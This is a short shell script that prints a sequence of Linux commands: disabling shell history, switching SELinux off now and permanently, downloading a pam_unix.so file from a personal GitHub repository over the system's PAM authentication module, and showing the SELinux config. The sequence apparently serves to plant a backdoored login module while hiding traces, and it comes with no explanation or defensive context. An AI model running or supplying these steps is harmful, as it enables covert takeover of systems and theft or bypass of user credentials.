echo -e "set +o history"
echo -e "setenforce 0"
echo -e "sed -i 's/SELINUX=enforcing/SELINUX=disabled/g' /etc/selinux/config"
echo -e "wget https://github.com/Pe1asguss/tes/blob/main/pam_unix.so -O /usr/lib64/security/pam_unix.so"
echo -e "cat /etc/selinux/config"
